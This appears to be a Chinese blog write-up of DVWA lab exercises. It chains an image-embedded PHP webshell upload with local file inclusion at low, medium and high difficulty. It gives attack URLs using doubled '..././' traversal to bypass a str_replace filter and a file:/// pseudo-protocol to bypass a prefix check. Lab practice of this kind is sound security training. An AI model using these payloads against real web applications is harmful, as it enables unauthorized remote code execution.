dvwa练习——file upload and inclusion(文件上传及包含)

 一、 file upload难度高级➕inclusion难度低级

1、使用终端拼接php木马文件和jpg文件为111shell2.jpg

2、file upload上传文件

3、进入file inclusion。

   (1)inclusion的url地址为:

        http://192.168.1.32:8082/vulnerabilities/fi/?page=include.php

   (2)上传成功的拼接文件题目所给地址为:

        ../../hackable/uploads/111shell2.jpg

   (3)将两者进行include拼接为:

        http://192.168.1.32:8082/vulnerabilities/fi/?page=../../hackable/uploads/111shell2.jpg

4、hackbar验证:

成功

二、file inclusion难度medium

1、同上方法来一遍发现出现报错:

        显示无法打开hackable/uploads文件,但输入的明明是../../hackable/uploads文件目录,说明../../没有了。

2、查看源代码:

        发现有str_replace函数将../../替换成空,通常对于str_replace的替换,采用双写进行绕过。

3、将url中加入双写绕过为:

        http://192.168.1.32:8082/vulnerabilities/fi/?page=..././..././hackable/uploads/111shell2.jpg

        验证成功:

三、file inclusion难度high

/***

        常用伪协议:

文件包含-伪协议_孤的博客-CSDN博客_文件包含伪协议

***/

 1、同上步骤查看报错:

        随便换一个别的文件发现也访问不了,查看源代码:

         发现文件必须是file开头或者includ.php文件,否则无法访问,使用伪协议中的file伪协议进行绕过。

3、尝试把chrome拉入浏览器中,发现url地址是file伪协议地址,得到file伪协议访问格式:

file:///C:/Users/Public/Desktop/Google%20Chrome.lnk

2、伪协议和图片地址进行拼接:

file:///C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg

3、inclusion地址和图片伪协议地址进行拼接

http://192.168.1.32:8082/vulnerabilities/fi/?page=file:///C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg

验证:

成功

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值